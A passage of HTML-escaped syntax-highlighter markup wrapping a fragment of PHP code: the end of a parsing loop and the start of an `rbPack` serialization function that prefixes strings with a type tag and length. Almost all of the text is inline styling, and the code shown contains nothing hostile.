!important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-147&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-148&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-149&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-150&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-151&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;2048&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;break&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-152&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-153&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$parsed&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-154&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-155&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-156&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbPack&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-157&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-158&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;is_string&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-159&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;STR&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;chr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strlen&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-160&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-161&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;elseif&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;is_array&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-162&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span 